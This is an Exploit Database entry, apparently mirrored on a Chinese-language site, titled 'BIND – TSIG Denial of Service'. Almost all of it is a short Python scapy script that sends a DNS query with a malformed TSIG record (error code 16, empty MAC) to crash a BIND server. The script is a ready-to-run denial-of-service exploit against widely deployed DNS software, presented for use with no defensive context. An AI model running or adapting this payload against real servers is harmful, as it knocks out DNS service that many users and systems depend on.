BIND – ‘TSIG’ Denial of Service

• Exploit Database
• 38 阅读

• 作者： Teppei Fukuda
  日期： 2020-05-20
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48521/

• #!/usr/bin/python
  #coding:utf-8
  
  from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT
  
  tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)
  
  dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
  answer = sr1(dns_req, verbose=0)
  
  print(answer[DNS].summary())